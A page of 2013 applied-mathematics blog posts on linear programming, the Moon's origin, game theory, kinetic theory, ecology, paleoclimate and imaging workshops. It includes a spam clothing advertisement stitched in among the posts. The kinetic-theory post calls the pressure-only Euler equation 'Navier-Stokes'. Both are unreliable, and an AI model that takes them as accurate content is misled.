A Berkeley graduate student, George Dantzig, was late for class. He scribbled down two problems from the blackboard and handed in solutions a few days later. But the problems on the board were not homework assignments; they were two famous unsolved problems in statistics. The solutions earned Dantzig his PhD.

With his doctorate in his pocket, he went to work with the US Air Force, designing schedules for training, stock distribution and troop deployment, activities known as programming. He was so efficient that, after the second World War, he was given a well-paid job at the Pentagon, with the task of mechanizing the program planning of the military. There he devised a dramatically successful technique, or algorithm, which he named linear programming (LP).

LP is a method for decision-making in a broad range of economic areas. Industrial activities are frequently limited by constraints. For example, there are normally constraints on raw materials and on the number of staff available. Dantzig assumed these constraints to be linear, with the variables, or unknown quantities, occurring in a simple form. This makes sense: if it requires four tons of raw material to make 1,000 widgets, then eight tons are needed to make 2,000 widgets. Double the output requires double the resources.

LP finds the maximum value of a quantity, such as output volume or total profit, subject to the constraints. This quantity, called the objective, is also linear in the variables. A real-life problem may have hundreds of thousands of variables and constraints, so a systematic method is needed to find an optimal solution. Dantzig devised a method ideally suited to LP, called the simplex method.

At a conference in Wisconsin in 1948, when Dantzig presented his algorithm, a senior academic objected, saying: “But we all know the world is nonlinear.” Dantzig was nonplussed by this put-down, but an audience member rose to his defence, saying: “The speaker titled his talk ‘Linear Programming’ and carefully stated his axioms. If you have an application that satisfies the axioms, then use it. If it does not, then don’t.” This respondent was none other than John von Neumann, the leading applied mathematician of the 20th century.

LP is used in a number of Irish industries. One interesting application, used by Coillte, is harvest scheduling. This enables decisions to be made about when and where to cut trees in order to maximize the long-term financial benefits. A more advanced system, which incorporates environmental and social constraints in addition to economic factors, is being developed by Coillte and UCD Forestry.

Coillte uses linear programming to make decisions about when and where to cut trees to maximize long-term benefits

Coillte uses linear programming to make decisions about when and where to cut trees to maximise long-term benefits

The acid test of an algorithm is its capacity to solve the problems for which it was devised. LP is an amazing way of combining a large number of simple rules and obtaining an optimal result. It is used in manufacturing, mining, airline scheduling, power generation and food production, maximizing efficiency and saving enormous amounts of natural resources every day. It is one of the great success stories of applied mathematics.

Peter Lynch, Professor of Meteorology
School of Mathematical Sciences
University College Dublin
BELFIELD, Dublin 4, Ireland
Home Page

Professor Lynch blogs at thatsmaths.com.

This article appeared in The Irish Times of Tuesday, October 8, 2013. Reprinted with the author’s permission.

Posted in Finance, Optimization, Resource Management | 1 Comment

Coming Soon in SIAM News

SIAM News will feature two lead articles that are very relevant to the themes of Math of Planet Earth. One, by writer Dana Mackenzie, is about mathematical modeling of traffic flows; the other, by writer Barry Cipra, is about reducing energy consumption in buildings.

Based on a talk by John Burns of Virginia Tech, this second article describes some of the mathematical challenges in increasing energy efficiency in modern commercial buildings. Why is this an important problem? According to the article, “buildings consume an enormous amount of energy,” accounting “for roughly 39% of total U.S. energy consumption.” In his talk, Burns brought home this point in a vivid way. A 70% reduction in energy consumption by residential and commercial buildings “would be equivalent to eliminating the entire U.S. transportation system.”

The article by Cipra discusses the mathematical challenges; as it quotes Burns – “buildings are complex, multi-scale, nonlinear, infinite-dimensional systems with hundreds of components that call for modeling, control, optimization,….” It further discusses modeling buildings for design and control.

To appear in the November issue of SIAM News.

Posted in Energy, Transportation | Leave a comment

Where Did the Moon Come From?

You may have read Edward Belbruno’s blog on New Ways to the Moon, Origin of the Moon, and Origin of Life on Earth of October 4th. I did and was intrigued by his application of weak transfer to the origin of the Moon, so I went to his 2005 joint paper with J. Richard Gott III with the same title, published in the Astronomical Journal.

Indeed, I already knew the earlier work of Jacques Laskar on the Moon in 1993. At the time, he had proved that it was the presence of the Moon that stabilizes the inclination of the Earth’s axis. Indeed, the axis of Mars has very large oscillations, up to 60 degrees, and Venus’s axis also had large oscillations in the past. The numerical simulations show that, without the Moon, the Earth’s axis would also have very large oscillations. Hence, the Moon is responsible for the stable system of seasons that we have on Earth, which may have favored life on our planet.

The current most plausible theory for the formation of the Moon is that it comes from the impact of a Mars-size planet with the Earth, which we will call the impactor. For information, the radius of Mars is 53% of that of the Earth, its volume is 15% of that of the Earth, and its mass only 10%. Evidence supporting the impactor hypothesis comes from the geological side: the Earth and the Moon contain the same types of oxygen isotopes, which are not found elsewhere in the solar system. The Earth and Mars both have an iron core, while the Moon has none. The theory is that, at the time of the collision, the iron in the Earth and in the impactor would already have sunk into their core, and also that the collision was relatively weak, hence only expelling debris from the mantle which would later aggregate into the Moon, while the two iron cores would have merged together. Indeed, the mean density of the Moon is comparable to that of the mean density of the Earth’s crust and upper mantle.

Mathematics cannot prove the origin of the Moon. It can only provide models which show that the scenario of the giant impactor makes sense, and that it makes more sense than other proposed scenarios. It is believed that the planets would have formed by accretions of small objects, called planetesimals. Because the impactor and the Earth had similar composition, they should have formed at roughly at the same distance from the Sun, namely one astronomical unit (AU). But then, why would it have taken so long before a collision occurred? Because the Earth and the impactor were at stable positions. The Sun, the Earth and the impactor form a 3-body problem. Lagrange identified some periodic motions of three bodies where they are located at the vertices of an equilateral triangle: the corresponding points for the third bodies are called Lagrange L4 and L5 points. These motions are stable when the mass of the Earth is much smaller than that of the Sun and the mass of the impactor, 10% of that of the Earth. Stability is shown rigorously using KAM theory for the ideal circular planar restricted problem and numerically for the full 3-dimensional 3-body problem, with integration over 10Myr.

Hence, it makes sense that a giant impactor could have formed at L4 or L5: this impactor is called Theia in the literature on the subject. Simulations indeed show that Theia could have grown by attracting planetesimals in its neighborhood. Let’s suppose that Theia is formed at L4. Why then didn’t it stay there? Obviously, it should have been destabilized. Simulations show that some small planetesimals located near the same Lagrange point could have slowly pushed Theia away from L4. The article of Belbruno and Gott studies the potential movements after destabilization. What is crucial is that, since the three bodies were at the vertices of an equilateral triangle, Theia and the Earth are at equal distances from the Sun. If the orbit of the Earth is nearly circular, Theia and the Earth share almost the same orbit! This is why there is a high danger of collision when Theia is destabilized.

If the ejection speed were small, Theia would move back and forth along a trajectory resembling a circular arc centered at the Sun with additional smaller oscillations. In a frame centered at the Sun and rotating with the Earth (hence the Earth is almost fixed), Theia moves back and forth in a region that looks like a horseshoe (see figure).

Theia

In this movement it never passes close to the Earth. An asteroid with a diameter of 100m, 2002 AA_29, discovered in 2002, has this type of orbit. This horseshoe region almost overlaps the Earth’s orbit. For a higher ejection speed, Theia would be pushed into an orbit around the Sun with radius approximately 1 AU and gradually creep towards the Earth’s orbit: it would pass regularly close to the Earth periapsis (the point of the Earth’s orbit closest to the Sun) in nearly parabolic trajectories, i.e., trajectories borderline of being captured by the Earth. Since the speed vectors of the two planets are almost parallel, the gravitational perturbation exerted by the Earth on Theia at each fly-by is small. The simulations show that these trajectories have a high probability of collision with Earth, not so long after leaving the Lagrange points (of the order of 100 years). Note that this kind of trajectory is highly chaotic and many simulations with close initial conditions allow seeing the different potential types of trajectories.

The five Lagrange points, L1, L2, L3, L4, L5 (figure from Belbruno).

Christiane Rousseau

Posted in General | Leave a comment

Budget Chicken

More and more the political wrangling over the government shutdown (and the looming debt ceiling) is described as a game of “Chicken,” which you probably know is the suicidal, hormonally charged confrontation of two teenage boys driving down a highway straight at each other. Whoever swerves first loses, but if neither swerves they also lose.

It does seem more complicated than that to me, but it could be instructive to analyze the game of Chicken from the perspective of classical game theory. For this we assign numerical values to the various outcomes for the players’ choices. I will use the numbers in Philip Straffin’s book Game Theory and Strategy published by the MAA. There are two players A and B (Administration and Boehner). Each has two strategies: swerve or don’t swerve. The rows of the payoff matrix represent A’s choices and the columns the choices of B. There is a pair of numbers for each of the four outcomes with the first number being the payoff to A and the second the payoff to B

swerve  don’t
swerve  (0,0) (-2,1)
don’t  (1,-2) (-8,-8)

For example, the pair (-2,1) in the upper right corner means that if A swerves and B doesn’t, then A loses two units and B gains one unit. Chicken is not a zero-sum game.

There are two Nash equilibria in the payoff matrix. These are the upper right and lower left corners in which one player swerves and the other doesn’t. With these scenarios neither player can do better by switching to a different option when the other player does not switch. (The definition of a Nash equilibrium is just that: it is a simultaneous choice of strategies for all the players so that no player can improve his lot by switching under the assumption that the other players do not change their choices.)

In addition, these Nash equilibria are optimal in the sense that there is not any other outcome that improves the lot of at least one of the players without making it worse for another player. (This is called Pareto optimality.) There is also a Nash equilibrium among the mixed strategies, where a mixed strategy is a probabilistic mixture of the two pure strategies. That is, for each p between 0 and 1, there is the mixed strategy of swerving with probability p and not swerving with probability 1-p. Then one can show that the mixed strategy with p=6/7 (i.e., swerve with probability 6/7, don’t swerve with probability 1/7) is also a Nash equilibrium, which means that neither player can do better by using a different mixed strategy assuming that the other player sticks with this one. In this case the payoff to each player is -2/7. Now, the payoffs are equal but this outcome is not Pareto optimal because both players can do better with the strategy of swerving in which case each receives 0.

And so it seems that there is no satisfactory solution to the game of Chicken and related games such as The Prisoner’s Dilemma—at least within the confines of classical game theory.

For some current commentary on game theory and the budget stalemate read the interview with Daniel Diermeier in the Washington Post.

Posted in Mathematics, Political Systems | Leave a comment

SIAM Conference on the Analysis of PDEs

Mathematics has always responded to demands of applications, even as mathematics continued to develop its own internal structures. One need only look back to the mid-twentieth century to see the mathematics spawned by demands of the military needs of the time. Today we see a tremendous growth in applied mathematics related to biology and medicine.

As an example, consider SIAM’s final conference in the year of Mathematics of Planet Earth—the SIAM Conference on the Analysis of PDEs. Applied PDEs were at one time primarily (although not exclusively) driven by problems in fluid flow –- from dynamics of flows across airplane surfaces to large-scale motion of atmospheric systems. While these problems continue to have importance, more recent applications have grown as well, including problems in imaging and in biology. These trends are indicated in the invited talks at the conference.

Among the invited speakers are two talks related to biology that show the role of mathematics.

Benoit Perthame of the Université Peirre et Marie Curie, Paris VI, will talk about the role PDEs play in modeling neural networks. According to Perthame, “Neurons exchange information via discharges propagated by membrane potentials which trigger firing of the many connected neurons. How to describe large networks of such neurons? How can such a network generate a collective activity?” His talk will discuss how such questions can be tackled using nonlinear partial-integro-differential equations. Among this class of equations, the Wilson-Cowan equations describe globally brain spiking rates. Another classical model is the integrate-and-fire equation based on Fokker-Planck equations. Berthame will analyze these models and discuss synchronization phenomena.

Philip Maini of Oxford University will describe a completely different set of biological phenomena that are modeled by PDEs. He will describe “three different examples of collective cell movement which require different modeling approaches: movement of cells in epithelial sheets, with application to rosette formation in the mouse epidermis and monoclonal conversion in intestinal crypts; cranial neural crest cell migration which requires a hybrid discrete cell-based chemotaxis model; acid-mediated cancer cell invasion, modeled via a coupled system of nonlinear partial differential equations.” All these models can be expressed in the framework of nonlinear diffusion equations, which can be used to understand a range of biological phenomena.

Mathematics is playing an increasing important role in the understanding and analysis of biological phenomena.

Posted in Biology, Conference Announcement, Mathematics | Leave a comment

Mpe Dimacs Rutgers Edu x DressHead High Waisted Short – Red / Thin Leather Belt

This Mpe Dimacs Rutgers Edu x DressHead High Waisted Short – Red / Thin Leather Belt comes in two different colors, red and black. Both colors are accessorized with a white belt. The front and back of the shorts has a pleated waist to better accentuate your figure. The shorts zip up in the back, which makes the zipper less noticeable or “invisible.” The high waist design of the shorts is what really emphasizes your figure, since your waist is slimmer than your hips. You will be easily noticeable in these sexy short shorts. Wear them for a trip to the park or during a day time picnic date. Either way, you’ll look hot in these leg baring shorts. For the small (S) size of the Mpe Dimacs Rutgers Edu x DressHead High Waisted Short – Red / Thin Leather Belt, its measurements are: length is 35 cm; waist circumference is 66 cm; hip circumference is 96 cm; and the trousers are68 cm.

Posted in General | Leave a comment

Deriving the Navier-Stokes Equations from Molecular Dynamics: A Case Study for Dimension Reduction

In today’s blog, I will go into one of the issues in mathematical ecology mentioned in yesterday’s blog reporting on the MBI workshop on “Sustainability and Complex Systems.” The issue came up in the discussion sessions, where the question was asked how one could apply dimension-reduction techniques to individual-based models (IBMs) and derive more manageable descriptions of ecological systems.

The discussion at the workshop reminded me of my earlier interest in gas dynamics, where a similar issue arises: How to derive continuum models like the Navier-Stokes equations from the equations of motion of the individual molecules that make up the gas. This issue is one of the main topics of investigation in kinetic theory; it has a long history going back to Ludwig Boltzmann in the 1870s. While the initial discussions were mostly heuristic, mathematical research in the latter part of the 20th century has provided a rigorous framework for the various approximations, so today the theory is on a more or less solid foundation.

In kinetic theory, a gas is thought of as a collection of mutually interacting molecules, possibly moving under the influence of external forces. We assume for simplicity that the molecules are all of the same kind (a “simple gas”) and that there are no external forces acting on the molecules. Each molecule moves in physical space; at each instant $t$, its state is described by its position vector $x$ and its velocity vector $c$. Molecules interact, they may attract or repel each other, and as they interact their velocities change. The interactions are assumed to be local and instantaneous and derived from some potential (for example, the Lennard-Jones potential). If the interaction is elastic, then mass, momentum, and kinetic energy are preserved, so the velocities of two interacting molecules are determined uniquely in terms of their velocities before the interaction.

At the microscopic level, the state of a gas comprising $N$ molecules is described by an $N$-particle distribution function $f_N$ with values $f_N (\mathbf{x}_1, \dots, \mathbf{x}_N, \mathbf{c}_1, \dots, \mathbf{c}_N, t)$. This function evolves in a $6N$-dimensional space according to the Liouville equation,
$$
\frac{\partial f_N}{\partial t} + \sum_{i=1}^N (\nabla_{\mathbf{x}_i} f_N) \cdot \dot{\mathbf{x}}_i + \sum_{i=1}^N (\nabla_{\mathbf{c}_i} f_N) \cdot \mathbf{F}_i = 0 ,
\quad \mathbf{F}_i = {\ } – \sum_{j=1}^N \nabla_{\mathbf{x}_i} \Phi_{ij} .
$$
Note that the Liouville equation is linear in $f_N$.

By integration over part of the variables, the Liouville equation is transformed into a chain of $N$ equations where the first equation connects the evolution of one-particle distribution function with the two-particle distribution function, the second equation connects the two-particle distribution function with the three-particle distribution function, and generally the $s$th equation connects the $s$-particle distribution function $f_s$ with the $(s+1)$-particle distribution function $f_{s+1}$,
$$
\frac{\partial f_s}{\partial t} + \sum_{i=1}^s (\nabla_{\mathbf{x}_i} f_s) \cdot \dot{\mathbf{x}}_i + \sum_{i=1}^s (\nabla_{\mathbf{c}_i} f_s) \cdot \mathbf{F}_i = {\ } – \sum_{i=1}^s \nabla_{\mathbf{c}_i} \int (\nabla_{\mathbf{x}_i} \Phi_{i, s+1}) f_{s+1} \, d\mathbf{x}_{s+1} \, d\mathbf{c}_{s+1} .
$$
This is the so-called BBGKY hierarchy (named after its developers, Bogoliubov, Born, Green, Kirkwood and Yvon). which is a description of a gas at the microscopic level. The equations in the hierarchy define a linear operator in the space of chains of length $N$ of density functions.

From the BBGKY hierarchy one obtains a description at the mesoscopic level by taking the equation for the one-particle distribution function and employing a closure relation to express the two-particle distribution function as the product of two one-particle distribution functions. This is the (in)famous “Stosszahlansatz,” which leads to the Boltzmann equation—an integrodifferential equation for the one-particle distribution function $f_1$ (which we denote henceforth simply by $f$, with values $f(\mathbf{x}, \mathbf{c}, t)$) with a quadratic nonlinearity on the right-hand side,
$$
\frac{\partial f}{\partial t} + (\nabla_{\mathbf{x}} f) \cdot \dot{\mathbf{x}} + (\nabla_{\mathbf{c}} f) \mathbf{F} = \int \int (f’_1 f’_2 – f_1 f_2) k_{12} \, dk\, d\mathbf{x}_2 ,
$$
where $f’_1$ and $f’_2$ denote the values of $f$ at the velocity variables $\mathbf{c}’_1$ and $\mathbf{c}’_2$ before the interaction and $f_1$ and $f_2$ the same at the velocity variables $\mathbf{c}_1$ and $\mathbf{c}_2$ after the interaction. The kernel $k_{12}$ represents the change in direction of the relative velocity of the two molecules as a result of their interaction. The step from the BBGKY hierarchy to the Boltzmann equation introduces not only a nonlinearity, it also introduces irreversibility: the Boltzmann equation is time-irreversible (Boltzmann’s H-Theorem).

When mass, momentum and internal energy are preserved in a molecular interaction, a further reduction is possible. The macroscopic variables of the gas are the mass density $\rho$, the hydrodynamic velocity $\mathbf{v}$, and the temperature $T$ (which is a measure of the internal energy). They are the velocity moments of $f$ with respect to mass, momentum and internal energy. Multiplying both sides of the Boltzmann equation with the molecular mass and integrating over all velocities, we obtain the continuity equation,
$$
\frac{\partial \rho}{\partial t} + \nabla \cdot (\rho \mathbf{v}) = 0 .
$$
Multiplying both sides of the Boltzmann equation with the momentum vector and integrating over all velocities, we obtain the equation of motion,
$$
\frac{\partial (\rho \mathbf{v} )}{\partial t} + \nabla \cdot (\rho \mathbf{v} \mathbf{v}) – \nabla \cdot \mathbb{T} = 0 ,
$$
where $\mathbb{T}$ is the Cauchy stress tensor.

If the gas is in hydrostatic equilibrium, the Cauchy stress tensor is diagonal, the shear stresses are zero, and the normal stresses are all equal. The hydrostatic pressure $p$ is the negative of the normal stresses, so $\mathbb{T} = -p{\ } \mathbb{I}$. The equation of motion reduces to
$$
\frac{\partial (\rho \mathbf{v}}{\partial t} + \nabla \cdot (\rho \mathbf{v} \mathbf{v}) + \nabla p = 0 .
$$
This is is the Navier-Stokes equation of fluid dynamics, which describes the evolution of the gas at the macroscopic level.

The procedure outlined above to derive the Navier-Stokes equation from the Boltzmann equation is known as the Chapman-Enskog procedure. It is essentially an asymptotic analysis based on a two-time scale singular perturbation expansion, where the macroscopic variables evolve on the slow time scale and the one-particle distribution function on the fast time scale.

Thus, there exists a very systematic procedure to get from the microscopic level (the Liouville equation and the BBGKY hierarchy) to the mesoscopic level (the Boltzmann equation) and from there to the macroscopic level (the Navier-Stokes equation). Given that the IBMs are the analog in ecology of the Liouville equation in gas dynamics, I suspect that there is a similar procedure to reduce the IBMs to more manageable equations at the macroscopic level. Food for thought.

References:

Joseph O. Hirschfelder, Charles Francis Curtiss, Robert Byron Bird, Molecular theory of gases and liquids, Wiley, 1954

J. H. Ferziger and H. G. Kaper, Mathematical Theory of Transport Processes in Gases, North-Holland Publ. Co., Amsterdam, 1972

Sydney Chapman, T. G. Cowling and C. Cercignani, The Mathematical Theory of Non-uniform Gases: An Account of the Kinetic Theory of Viscosity, Thermal Conduction and Diffusion in Gases, Cambridge Mathematical Library, 1991

Posted in Dimension Reduction, Ecology, Mathematics | Leave a comment

MBI Workshop “Sustainability and Complex Systems”

During the week of September 16-20, 2013, I attended a workshop on “Sustainability and Complex Systems” at the Mathematical Biosciences Institute at Ohio State. This was the first of three workshops on the theme “Ecosystem Dynamics and Management,” organized under the umbrella of MPE2013.

The workshop was organized by Chris Cosner (Dept of Mathematics, U Miami), Volker Grimm (Helmholtz Centre for Environmental Research, Leipzig, Germany), Alan Hastings (Department of Environmental Science and Policy, UC Davis), and Otso Ovaskainen (Dept of Biosciences, U Helsinki, Finland) and was attended by some 40 researchers from a variety of disciplines, including biology, ecology, environmental science, marine science, public policy, mathematics, and statistics.

In their abstract for the workshop, the organizers wrote: “Creating mathematical models for the sustainability of ecosystems poses many mathematical challenges. Ecosystems are complex because they involve multiple interactions among organisms and between organisms and the physical environment, at multiple scales both in time and in space, with feedback loops making connections across scales.” The workshop program reflected this wide range of challenges. The talks covered anything from conceptual dynamical-systems models to highly detailed individual- or agent-based models (IBMs). During the workshop, there was ample opportunity to discuss the issues, and a display of topical posters highlighted specific case studies in more detail.

The titles of the talks give an idea of the variety of topics covered at the workshop:

  • Aquaculture and Sustainability of Coastal Ecosystems (Mark Lewis)
  • Modeling socio-economic aspects of ecosystem management and biodiversity conservation (Yoh Isawa)
  • Individual-based Ecology (Volker Grimm)
  • Sustainability of agroecosystems: insights from the multiscale insect pest monitoring (Sergei Petrovskii)
  • A network-patch modeling framework for the transmission of vector-borne infections (Mac Hyman)
  • A trait-based perspective of complex systems (Priyanga Amarasekare)
  • Stochasticity in complex systems (Karen Abbott)
  • Tipping points beyond bifurcations (Sebastian Wieczorek)
  • Challenges in Modeling Biological Invasions and Population Distributions in a Changing Climate (Chris Cosner)
  • Role of time scales in sustainability of complex systems (Alan Hastings)
  • Coarse-graining computations for complex systems (Yannis Kevrekidis)
  • Tipping Points in Contagion Models (Carl Simon)
  • Beyond the proof of concept: virtual ecologists in complex dynamic systems (Damaris Zurell)
  • Models and data: from individuals to populations (Otso Ovaskainen)

Various discussion groups addressed issues of current interest in the ecology community. These groups were formed on an ad-hoc basis and met several times during the workshop. The workshop participants were encouraged to rotate among the groups, to promote diversity of viewpoints. Summaries of the discussions were presented in plenary sessions. Here are some headlines that were discussed:

  • Can IBMs fill in gaps when experiments are not feasible?
  • How to incorporate stochasticity in IBMs and how to assess the results?
  • How to couple evolution, ecology and heterogeneity and get a tractable model?
  • Mathematical methods for dimension reduction;
  • Construction of ecological models in the presence of uncertainty and tools for management under uncertainty;
  • Human factors;
  • Established concepts for the analysis of complex systems.

Other workshops in the Fall 2013 program on “Ecosystem Dynamics and Management” are devoted to “Rapid Evolution and Sustainability” (October 7-11) and “Sustainable Management of Living Natural Resources” (November 4-8).

Posted in Complex Systems, Ecology, Workshop Report | Leave a comment

Understanding Earth’s Past Climate: How the Mathematical Sciences Can Help to Inform the Debate on Climate Change

Some of the fundamental questions about the Earth’s climate are only partially addressed: What is the relationship between temperature measurements and greenhouse gas emissions, and what do these relationships tell us about the sensitivity of climate to increased greenhouse gas concentrations? How can historical temperature measurements inform this understanding? To what extent are temperatures during the last few decades anomalous in a millennial context? What is the link between tropical cyclone intensity and ocean warming?

To answer these questions accurately, data that is reliable, continuous, and of broad spatial coverage is required. It is well known that direct physical measurements of climate fields (such as temperature) are limited both temporally and spatially, with measurement quality and availability sharply decreasing as one goes further back in time. Unfortunately, measurements of land and sea surface temperature fields cover only the post-1850 period (often referred to as the instrumental period), with large regions afflicted by missing data, measurement errors, and changes in observational practices. Hence, hemispheric temperatures during the past millennium can only be inferred indirectly by using temperature-sensitive geological proxy data such as tree rings, ice cores, corals, speleothems (cave formations), and lake sediments. These temperature-sensitive geological proxy data act as nature’s thermometers and thus contain valuable information about past climates; see Guillot, Rajaratnam and Emile-Geay (2013), Janson and Rajaratnam (2013), and other literature for more details on this topic.

The reconstruction of past climates using proxy data is basically a statistical problem which requires tools from various branches of the mathematical sciences. More concretely, the statistical paleoclimate reconstruction problem involves (1) extracting the relationship between temperature and temperature-sensitive geological proxy data, (2) using this relationship to backcast (or hindcast) past temperature, and (3) quantifying the uncertainty that is implicit in such paleoclimate reconstructions, i.e., make probabilistic assessments on past climate.

The problem is exacerbated by several methodological and practical issues:

  • Data: Proxy data is not available everywhere on the globe and decreases sharply back in time.
  • Data: Instrumental temperature data is limited, both spatially and temporally.
  • Methodology: The high-dimensional nature of the reconstruction problem stems from the fact that the number of time points to undertake regression to relate temperature to proxies is very limited. Hence, standard statistical methods such as ordinary least squares regression techniques do not readily apply.
  • Methodology: There is both temporal and spatial correlation in both proxy and temperature data.
  • Methodology: The traditional assumption of normality of errors is often unrealistic due to the outliers in the data.

The nonstandard settings under which paleoclimate reconstructions have to be undertaken leads to a variety of statistical problems with important and deep questions in applied and computational mathematics and also in pure mathematics.

First, given the ill-posed nature of the regression problem, it is not clear which high-dimensional regression methodology or type of regularization (like Tikhonov regularization) is applicable. Second, the need to model a spatial random field requires specifying probabilistic models for understanding the correlation structure of temperature points and proxies in both space and time. Even a coarse 5-by-5 latitude/longitude gridded field on the earth leads to more than 2000 spatial points. Specifying covariance matrices of this order requires estimating about 2 million parameters—which is a non-starter given the fact that only 150 years of data is available. Hence, sparse covariance modeling is naturally embedded in the statistical paleoclimate reconstruction problem. Estimating covariance matrices in an accurate but sparse way leads to important questions in convex optimization. Regularization methods for inducing sparsity in covariance matrices leads to characterizing maps which leave the cone invariant. Such questions have actually been considered in a more classical setting by the work of Rudin and Schoenberg. They are however not directly applicable to the paleoclimate reconstruction problems and require further generalizations and extensions.

These are just a few examples where pure mathematics, statistics, applied and computational mathematics are essential tools in current techniques that are used for understanding Earth’s past climate. The need to develop rigorous mathematical and statistical tools is thus critical for such contemporary earth science endeavors.

References:

Guillot, D., B. Rajaratnam, and J. Emile-Geay (2013), Statistical Paleoclimate Reconstructions via Markov Random Fields, Technical Report, Department of Statistics, Stanford University; arXiv:1309.6702 [stat.AP]

Janson, L. and B. Rajaratnam, B. (2013), A Methodology for Robust Multiproxy Paleoclimate Reconstructions and Modeling of Temperature Conditional Quantiles, Journal of the American Statistical Association (in print); arXiv:1308.5736 [stat.ME]

Bala Rajaratnam
Department of Statistics and Environmental Earth System Science
Institute for Computational and Mathematical Engineering
The Woods Institute for the Environment
Stanford University

Posted in Paleoclimate, Statistics | Leave a comment

Modeling the Evolution of Ancient Societies

Another mathematical modeling success is highlighted in a September 23, 2013, Science News story that describes the evolution of ancient complex societies. One interesting fact reported is that intense warfare is the evolutionary driver of complex societies. The findings accurately match the historical records. The study was done by a trans-disciplinary team at the University of Connecticut, the University of Exeter, and NIMBioS and is available as an open access article in the Proceedings of the National Academy of Sciences. To see a simulation try this, and for more information see the press release.

Estelle Basor
American Institute of Mathematics

Posted in Social Systems | Leave a comment

Frontiers in Imaging, Mathematics, and the Life Sciences

As society increasingly benefits from the various types and uses of imaging, there is a growing need to integrate imaging data across modalities and to develop new imaging techniques. Not surprisingly, the mathematical sciences—mathematics, statistics, and computational science—all play a role in this growing area.

As part of the effort to address the challenges in this area, NSF’s Mathematical Biosciences Institute (MBI) at Ohio State University is hosting four spring semester workshops aimed at the interface of imaging, mathematics, and the life sciences. This one-semester program will bring together researchers from mathematics, imaging technology, biology, and the life sciences to explore new ways to bridge these diverse disciplines and to facilitate further usage of mathematics for key problems in imaging, medicine, and the life sciences in general. People interested in attending are welcome to apply here.

  • Visualizing and Modeling Cellular and Sub-Cellular Phenomena (January 13-17, 2014)

    The frontier of biology and medicine is defined by our ability to decipher the mechanisms that underlie basic phenomena. These phenomena may include cell motility and migration, cell division, cell reprogramming, and cell communication that may be manifested in a wide range of questions in development and disease. Thus, examples from stem cell, developmental, neural, and cancer biology have the potential to allow examination of basic biological processes within the context of real, in vivo phenomena. However, a major challenge has been the lack of a means to identify biologically tractable problems and link these problems to applications-oriented experts from imaging and mathematics.

    The rate at which this frontier advances depends, at least in part, on how fast technology evolves and on how data is interpreted and translated into a better understanding of basic mechanisms. In the past 10 years, dramatic advances in imaging technology and mathematics have provided new tools and models for discovery that have enabled new observations and hypotheses to be tested. These tools, which are often designed for general applications, find their way into the hands of biologists who then see ways to use them. In some cases, specific mathematical models and applications drive innovations. The mathematical methods involved include PDEs, moving boundary value problems, dynamic geometric changes, optimal transport, stochastic modeling, and the analysis of large data sets. Advances in imaging technology that will be discussed include serial block-face scanning electron microscopy, superresolution microscopy, fluorescence resonance energy transfer (FRET)-based activity biosensors, detection of forces in cells and tissue, multispectral and multiphoton deep tissue imaging, and fluorescence light-sheet microscopy.

    The goal of this workshop is to encourage biologists to describe tough questions and to jointly think about approaches that inspire new developments and interdisciplinary research collaborations. We plan to do this by combining input and discussion from experts in imaging technology and mathematics with cell, developmental and cancer biologists that share a passion for solving the riddles that underlie complex phenomena in dynamic living systems. We suggest that both groups of participants blend what is technically possible with what exists only in dream space, with the hope that together we will learn something new and be stimulated to explore new ways to visualize, model and better understand complex processes.

  • Morphogenesis, Regeneration, and the Analysis of Shape (February 10-14, 2014)

    This workshop addresses the broad class of imaging problems in the life sciences that rely on shape or geometry to characterize biological processes and parameters. Of course, the strategy of observing shape and its relationships to biology is a classical undertaking, but in recent years, the availability of 3D imaging and better computational tools has opened up new possibilities for systematic, quantitative analyses of biological shape. This, in turn, has resulted in new demands for more fundamental approaches, based in mathematics, for quantifying and analyzing geometric objects. The problem of quantifying shapes arises in clinical science, where the shapes of neurological or musculoskeletal structures are thought to be related to growth, function, pathology, and degeneration. More recently, computational strategies for shape analysis have become widespread throughout the life sciences, with compelling applications in anthropology, cell and tissue biology, botany, etc.

    The mathematical contributions to shape analysis have resulted in new tools for modeling or characterizing shapes and for analyzing both shape dynamics and the statistics of populations of shapes. However, the applications of these methods are typically limited by somewhat strong assumptions about the classes of shapes, such as smoothness, correspondence, and homogeneity or underlying simplifications in morphogenetic processes. This workshop focuses on the frontiers of this technology with an eye toward new applications, such as cell biology and biological morphogenesis, which have yet to benefit from robust, comprehensive approaches. Of particular interest are more general tools for handling nonmanifold shapes, such as networks or trees, as well as tools that can handle relatively heterogeneous collections of objects, such as those seen in cell or tissue biology. Also important is the analysis of dynamic shapes as in morphogenesis and regeneration, and the links to other data such as lineage, genomics, and proteomics. Participants will consist of life scientists with compelling scientific and clinical examples, engineers with computational tools for shape analysis, and mathematicians with insights into fundamental approaches for representing and quantifying shape.

  • Integrating Modalities and Scales in Life Science Imaging (March 17-21, 2014)

    Merging imaging modalities is increasingly important for biomedical questions related to time and space scales including function and anatomy. Integrating modalities from multiple scales can assist with understanding development and function, disease, diagnosis and treatment. This workshop will bring together researchers who are attempting to combine and integrate different imaging modalities to better understand anatomy, function and disease from the cellular to organ level.

    Methodologies and challenges in combining imaging data from multiple sources, such as MRI, fMRI, DTI, PET, EEG, MEG, CT, ultrasound, NMR, x-ray diffraction, electron microscopy, proteomic and genomic data will be explored. Merging data from different modality time scales (functional time scales from nanoseconds to minutes; developmental time scales from embryonic to adult) and space scales (from microns to millimeters) present many mathematical questions. Interpretation, analysis and modeling of multi-modality data as it applies to development, disease models and therapies will also be explored. The heterogeneity of the data presents many difficult challenges that are suited for mathematical exploration.

    The focus will include brain and cardiac imaging related to multiscale and bioscale data collection, merging data, modeling and analysis. This workshop will be of interest to mathematicians working in areas of statistical analysis, PDE modeling, inverse problems, differential geometry, computational visualization and multiscale problems. Biomedical researchers interested in merging imaging modalities to investigate questions related to genomics, gene expression and biomarkers and the role they play in macroscopic function would benefit from this workshop.

  • Analysis and Visualization of Large Collections of Imaging Data (April 21-25, 2014)

    This workshop focuses on the challenges presented by the analysis and visualization of large data sets that are collected in biomedical imaging, genomics and proteomics. The sheer size of data (easily in the range of terabytes, and growing) requires computationally efficient techniques for the sampling, representation, organization, and filtering of data; ideas and techniques from signal processing, geometric and topological analysis, stochastic dynamical systems, machine learning and statistical modeling are needed to extract patterns and characterize features of interest. Visualization enables interaction with data, algorithms, and outputs.

